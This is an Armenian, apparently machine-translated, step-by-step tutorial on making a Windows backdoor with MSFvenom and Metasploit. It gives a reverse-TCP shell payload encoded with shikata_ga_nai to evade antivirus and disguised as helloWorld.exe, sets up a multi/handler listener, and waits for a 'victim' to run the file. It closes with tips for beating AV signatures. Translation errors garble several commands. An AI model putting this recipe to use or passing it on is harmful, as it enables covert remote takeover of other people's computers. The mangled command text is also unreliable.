Հետնամասը օգտագործվում է անվտանգության մեխանիզմները շրջանցելու համար, հաճախ գաղտնի և հիմնականում աննկատելի: Օգտագործելով MSFvenom- ը ՝ msfpayload- ի և msfencode- ի համադրությունը, հնարավոր է ստեղծել հետնամաս, որը հետ կապվում է հարձակվողին ՝ օգտագործելով հակառակ պատյան TCP: Հետդուռ ստեղծելու համար հարկավոր է փոխել ձեր չարամիտ ծրագրերի ստորագրությունը ՝ հակավիրուսային ծրագրերից խուսափելու համար: Ավարտեք այս նախագիծը մի զույգ համակարգիչների վրա, որոնց մուտք գործելու թույլտվություն ունեք, և այդ ընթացքում դուք ավելին կիմանաք համակարգչային անվտանգության և ինչպես է աշխատում այս տեսակի դռները:
Քայլեր
Քայլ 1. Գործարկեք Kali- ն և գործարկեք Terminal վահանակը:
Քայլ 2. Մուտքագրեք ifconfig ՝ ինտերֆեյսը ցուցադրելու և ձեր IP հասցեն ստուգելու համար:
Քայլ 3. Մուտքագրեք msfvenom -l կոդավորիչները `կոդավորողների ցանկը ցուցադրելու համար:
Որպես կոդավորիչ ՝ դուք կօգտագործեք x86/shikata_ga_nai:
Քայլ 4. Մուտքագրեք "msfvenom -a x86 -պլատֆորմային պատուհաններ -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -պլատֆորմի պատուհանները նշանակում են օգտագործման ճարտարապետություն:
- -p windows/shell/reverse_tcp նշանակում է բեռներ, որոնք պետք է տեղադրվեն:
- LHOST- ը նշանակում է լսողի IP հասցեն:
- LPORT- ը նշանակում է լսողի նավահանգիստ:
- -b "\ x00" նշանակում է խուսափել վատ նիշից (զրոյական բայթ):
- -e x86/shikata_ga_nai նշանակում է կոդավորողների անունը:
- -f exe> helloWorld.exe նշանակում է ձևաչափի ելք:
Քայլ 5. Մուտքագրեք msfconsole- ը `Metasploit- ը ակտիվացնելու համար:
Այժմ դուք ստեղծել եք ձեր հետնամասը: Երբ զոհը կտտացնում է helloWorld.exe- ին, ներկառուցված կեղևի ծանրաբեռնվածությունը կակտիվանա և նորից կապ կհաստատի ձեր համակարգին: Կապը ստանալու համար դուք պետք է բացեք բազմաբեռնիչը Metasploit- ում և սահմանեք բեռնվածությունը:
Քայլ 6. Մուտքագրեք use exploit/multi/handler:
Քայլ 7. Մուտքագրեք set loadload windows/shell/reverse_tcp:
Քայլ 8. Մուտքագրեք ցուցադրման ընտրանքները `մոդուլը ստուգելու համար:
Քայլ 9. Մուտքագրեք հավաքածու LHOST 192.168.48.129:
«LHOST» - ը նշանակում է ունկնդրի IP հասցեն:
Քայլ 10. Մուտքագրեք հավաքածու LPORT 4444:
«LPORT» - ը նշանակում է լսողի նավահանգիստ:
Քայլ 11. Մուտքագրեք run և սպասեք զոհի մեքենայից միացմանը:
Քայլ 12. Սպասեք, մինչև զոհը կտտացնի helloWorld.exe- ին:
Այնուհետև հաջողությամբ միացված կլինեք զոհի մեքենային:
Խորհուրդներ
- -I- ի օգտագործումը MSFvenom- ում կներկայացնի կոդավորման կրկնությունները: Երբեմն ավելի շատ կրկնություններ կարող են օգնել խուսափել AV ծրագրակազմից:
- Դուք սովորել եք, թե ինչպես է ստեղծվում հետնամուտքն ու կոդավորվածը ՝ օգտագործելով MSFvenom- ը, սակայն մեր օրերում այս մեթոդը կատարյալ չի աշխատի որոշ AV ծրագրակազմերի դեմ: Դրա պատճառը MSFvenom- ում կատարման ձևանմուշներն են: AV վաճառողները ավելացրել են այս կաղապարների ստատիկ ստորագրությունը և պարզապես փնտրում դրանք: Այս հարցի լուծումը տարբեր կատարման ձևանմուշի կամ տարբեր գործիքների օգտագործումն է: